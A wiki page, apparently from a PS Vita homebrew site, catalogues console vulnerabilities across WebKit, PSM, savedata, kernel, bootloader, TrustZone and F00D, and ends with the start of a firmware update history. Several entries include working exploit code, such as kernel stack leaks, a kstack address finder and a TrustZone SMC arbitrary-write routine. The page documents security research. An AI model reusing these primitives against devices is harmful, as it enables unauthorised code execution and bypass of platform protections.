<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
When calling syscall, calling with invalid syscall id will end the svc interrupt without clearing vaddr in r0's syscall table.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Boot ROM ===<br />
<br />
(2019-08-30) To be disclosed.<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
Not patched yet (not sure).<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code> which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory) and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table that all points to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it almost requires no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style of glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=11475System Software2019-08-30T23:14:51Z<p>Xyz: </p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
